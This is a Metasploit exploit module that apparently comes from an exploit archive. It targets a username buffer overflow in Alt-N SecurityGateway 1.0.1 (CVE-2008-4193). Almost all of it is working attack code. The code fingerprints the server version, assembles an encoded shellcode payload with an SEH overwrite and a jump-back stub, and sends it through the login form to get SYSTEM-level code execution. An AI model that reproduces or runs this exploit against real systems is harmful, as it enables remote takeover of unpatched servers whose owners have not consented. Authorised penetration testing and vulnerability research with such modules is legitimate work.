Alt-N SecurityGateway username Buffer Overflow

`##  
# $Id: altn_securitygateway.rb 8010 2009-12-28 20:38:50Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = AverageRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Alt-N SecurityGateway username Buffer Overflow',  
'Description' => %q{  
Alt-N SecurityGateway is prone to a buffer overflow condition. This  
is due to insufficient bounds checking on the "username"  
parameter. Successful exploitation could result in code  
execution with SYSTEM level privileges.  
  
NOTE: This service doesn't restart, you'll only get one shot. However,  
it often survives a successful exploitation attempt.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8010 $',  
'References' =>  
[  
[ 'CVE', '2008-4193' ],  
[ 'OSVDB', '45854' ],  
[ 'BID', '29457']  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 476,  
# note: 0xd7 might not be translated, but w/e  
'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),  
'StackAdjustment' => -3500,  
'EncoderType' => Msf::Encoder::Type::SingleStaticBit,  
'EncoderOptions' =>  
{  
'BitNumber' => 0x5,  
'BitValue' => true,  
}  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'Automatic Targeting', { } ],  
# NOTE: the return address must be tolower() safe  
[ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jun 02 2008'))  
  
register_options([Opt::RPORT(4000)], self.class)  
end  
  
  
# Identify the target based on the SecurityGateway version number  
def auto_target  
print_status("Attempting to automatically selct a target...")  
res = send_request_raw(  
{  
'uri' => '/SecurityGateway.dll'  
}, 10)  
  
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)  
case $1  
when /1\.0\.1/  
return self.targets[1]  
end  
end  
  
# Not vulnerable  
return nil  
end  
  
  
def exploit  
  
# handle auto-targeting  
mytarget = target  
if target.name =~ /Automatic/  
  
mytarget = auto_target  
if mytarget.nil?  
raise RuntimeError, "Unable to automatically select a target"  
end  
print_status("Automatically selected target \"#{mytarget.name}\"")  
end  
  
# the buffer gets CharLowerBuff()'d and passed to:  
# sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);  
  
sploit = payload.encoded  
sploit << generate_seh_record(mytarget.ret)  
distance = payload_space + 8  
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string  
sploit = Rex::Text.to_hex(sploit, '%')  
sploit << rand_text_alphanumeric(512)  
  
post_data = 'RequestedPage=login'  
post_data << '&username=' << sploit  
post_data << '&passwd=world'  
  
print_status("Sending request...")  
res = send_request_cgi({  
'uri' => '/SecurityGateway.dll',  
'method' => 'POST',  
'content-type' => 'application/x-www-form-urlencoded',  
'data' => post_data,  
}, 5)  
  
handler  
end  
  
end  
`